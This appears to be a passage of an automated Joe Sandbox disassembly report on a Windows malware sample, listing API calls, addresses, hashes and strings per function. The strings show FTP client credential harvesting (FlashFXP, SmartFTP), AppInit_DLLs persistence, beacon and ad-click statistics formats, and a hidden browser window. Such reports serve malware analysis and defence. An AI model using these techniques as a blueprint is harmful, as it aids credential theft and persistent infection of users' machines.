                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • folder, xrefs: 00405184
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
